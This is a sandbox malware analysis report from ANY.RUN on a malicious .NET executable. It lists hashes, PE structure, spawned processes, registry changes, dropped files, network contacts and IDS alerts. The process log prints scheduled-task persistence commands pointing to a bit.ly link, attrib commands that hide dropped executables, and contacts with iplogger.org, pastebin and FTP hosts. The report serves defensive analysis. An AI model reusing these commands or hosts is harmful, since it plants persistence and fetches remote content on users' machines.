File name: | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1 |
Full analysis: | https://app.any.run/tasks/4913ffd2-ac87-4520-bffe-e88e9ff7dd65 |
Verdict: | Malicious activity |
Analysis date: | October 05, 2022, 04:04:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 10E6C5653D2929236947CA08594F0F55 |
SHA1: | 9ED6646EF7F0815D02066B60CD7BBC8D27CBF360 |
SHA256: | 851266DA3FFDF9C37B139611382B30710AB960B761125CDDE6CBA1EEAEBF24E1 |
SSDEEP: | 6144:mQvE/UVPy/oCa+LDZWC9z5NUb+knq1diDmN:3vzPygCa+DZCnq1c+ |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (56.7) |
---|---|---|
.exe | | | Win64 Executable (generic) (21.3) |
.scr | | | Windows screen saver (10.1) |
.dll | | | Win32 Dynamic Link Library (generic) (5) |
.exe | | | Win32 Executable (generic) (3.4) |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 2021-Apr-04 22:20:05 |
FileDescription: | - |
FileVersion: | 0.0.0.0 |
InternalName: | ServiceHub.exe |
LegalCopyright: | - |
OriginalFilename: | ServiceHub.exe |
ProductVersion: | 0.0.0.0 |
Assembly Version: | 0.0.0.0 |
e_magic: | MZ |
---|---|
e_cblp: | 144 |
e_cp: | 3 |
e_crlc: | - |
e_cparhdr: | 4 |
e_minalloc: | - |
e_maxalloc: | 65535 |
e_ss: | - |
e_sp: | 184 |
e_csum: | - |
e_ip: | - |
e_cs: | - |
e_ovno: | - |
e_oemid: | - |
e_oeminfo: | - |
e_lfanew: | 128 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
NumberofSections: | 3 |
TimeDateStamp: | 2021-Apr-04 22:20:05 |
PointerToSymbolTable: | - |
NumberOfSymbols: | - |
SizeOfOptionalHeader: | 224 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 8192 | 242180 | 242688 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.60311 |
.rsrc | 253952 | 3848 | 4096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.89935 |
.reloc | 262144 | 12 | 512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0815394 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.17246 | 596 | UNKNOWN | UNKNOWN | RT_VERSION |
1 (#2) | 4.96259 | 3087 | UNKNOWN | UNKNOWN | RT_MANIFEST |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3188 | "C:\Users\admin\Desktop\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe" | C:\Users\admin\Desktop\851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Explorer.EXE | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 0.0.0.0 Modules
| |||||||||||||||
772 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3568 | schtasks /create /f /st "17:41" /sc daily /mo "5" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq" | C:\Windows\system32\schtasks.exe | — | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3632 | schtasks /create /f /st "11:42" /sc daily /mo "5" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq" | C:\Windows\system32\schtasks.exe | — | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3700 | schtasks /create /f /st "18:29" /sc daily /mo "3" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq" | C:\Windows\system32\schtasks.exe | — | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3200 | schtasks /create /f /st "13:52" /sc weekly /mo "4" /d "Thu" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq" | C:\Windows\system32\schtasks.exe | — | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1980 | schtasks /create /f /st "06:57" /sc monthly /m "may" /tn "Intel TXE" /tr "'explorer'http://bit.ly/2Q7XObq" | C:\Windows\system32\schtasks.exe | — | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3448 | "C:\Users\admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe" | C:\Users\admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Version: 0.0.0.0 Modules
| |||||||||||||||
2488 | cmd /c attrib -H -R -S "C:\Users\admin\AppData\Roaming\addins\\iscsicli.exe" & attrib -H -R -S "C:\Users\admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D | C:\Windows\system32\cmd.exe | — | SystemPropertiesPerformance.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2704 | cmd /c attrib +H +R +S "C:\Users\admin\AppData\Roaming\addins\\iscsicli.exe" & attrib +H +R +S "C:\Users\admin\AppData\Roaming\addins\\iscsicli.exe\*" /S /D | C:\Windows\system32\cmd.exe | — | SystemPropertiesPerformance.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
|
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000003C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
Operation: | write | Name: | Startup |
Value: C:\Users\admin\AppData\Roaming\LinkM | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Reboot |
Operation: | write | Name: | ADX |
Value: U3VjY2Vzc2Z1bGx5IFJlYWR5IQ== | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (3188) 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing |
PID | Process | Filename | Type | |
---|---|---|---|---|
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | C:\Users\admin\AppData\Roaming\addins\SystemPropertiesPerformance.exe | executable | |
MD5:10E6C5653D2929236947CA08594F0F55 | SHA256:851266DA3FFDF9C37B139611382B30710AB960B761125CDDE6CBA1EEAEBF24E1 | |||
3448 | SystemPropertiesPerformance.exe | C:\Users\admin\AppData\Roaming\addins\iscsicli.exe | executable | |
MD5:14EFEF5A091B2E4189B9103DDB849936 | SHA256:A1E65E10AE43F8E437AB824E29231B69A8458B4AEBD8A77AC27D22B70169DAE6 | |||
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | C:\Users\admin\AppData\Roaming\LinkM\SystemPropertiesPerformance.exe.lnk | lnk | |
MD5:EDF525E996C9023553346AFFE0CE7DF4 | SHA256:9649ADB29F61181EA9D000DC8028DE8781658E11AC1117FFAA84128CE8FE33F3 | |||
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | C:\Users\admin\AppData\Roaming\LinkM\desktop.ini | text | |
MD5:7F1698BAB066B764A314A589D338DAAE | SHA256:CDB11958506A5BA5478E22ED472FA3AE422FE9916D674F290207E1FC29AE5A76 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | 64.40.144.30:21 | ftp.encompossoftware.com | 1P-WSS | DE | suspicious |
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | 148.251.234.83:443 | iplogger.org | Hetzner Online GmbH | DE | malicious |
— | — | 64.40.144.30:49669 | ftp.encompossoftware.com | 1P-WSS | DE | suspicious |
3448 | SystemPropertiesPerformance.exe | 35.173.69.207:443 | dpaste.com | AMAZON-AES | US | malicious |
3448 | SystemPropertiesPerformance.exe | 172.67.34.170:443 | pastebin.com | CLOUDFLARENET | US | malicious |
Domain | IP | Reputation |
---|---|---|
iplogger.org |
| shared |
ftp.encompossoftware.com |
| suspicious |
pastebin.com |
| shared |
dpaste.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potential Corporate Privacy Violation | ET POLICY IP Check Domain (iplogger .org in DNS Lookup) |
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Potential Corporate Privacy Violation | ET POLICY IP Check Domain (iplogger .org in TLS SNI) |
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3188 | 851266da3ffdf9c37b139611382b30710ab960b761125cdde6cba1eeaebf24e1.exe | Potential Corporate Privacy Violation | ET INFO .exe File requested over FTP |